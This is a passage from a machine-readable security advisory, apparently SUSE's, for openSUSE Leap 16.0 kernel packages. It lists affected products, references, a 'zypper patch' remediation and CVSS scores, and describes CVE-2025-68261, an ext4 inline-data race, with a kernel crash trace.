"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68245",
"url": "https://www.suse.com/security/cve/CVE-2025-68245"
},
{
"category": "external",
"summary": "SUSE Bug 1255268 for CVE-2025-68245",
"url": "https://bugzilla.suse.com/1255268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68245"
},
{
"cve": "CVE-2025-68261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: add i_data_sem protection in ext4_destroy_inline_data_nolock()\n\nFix a race between inline data destruction and block mapping.\n\nThe function ext4_destroy_inline_data_nolock() changes the inode data\nlayout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS.\nAt the same time, another thread may execute ext4_map_blocks(), which\ntests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks()\nor ext4_ind_map_blocks().\n\nWithout i_data_sem protection, ext4_ind_map_blocks() may receive inode\nwith EXT4_INODE_EXTENTS flag and triggering assert.\n\nkernel BUG at fs/ext4/indirect.c:546!\nEXT4-fs (loop2): unmounting filesystem.\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014\nRIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546\n\nCall Trace:\n \u003cTASK\u003e\n ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681\n _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822\n ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124\n ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255\n ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000\n generic_perform_write+0x259/0x5d0 mm/filemap.c:3846\n ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285\n ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679\n call_write_iter include/linux/fs.h:2271 [inline]\n do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735\n do_iter_write+0x186/0x710 fs/read_write.c:861\n vfs_iter_write+0x70/0xa0 fs/read_write.c:902\n iter_file_splice_write+0x73b/0xc90 fs/splice.c:685\n do_splice_from fs/splice.c:763 [inline]\n direct_splice_actor+0x10f/0x170 fs/splice.c:950\n splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896\n do_splice_direct+0x1a9/0x280 fs/splice.c:1002\n do_sendfile+0xb13/0x12c0 fs/read_write.c:1255\n __do_sys_sendfile64 fs/read_write.c:1323 [inline]\n __se_sys_sendfile64 fs/read_write.c:1309 [inline]\n __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
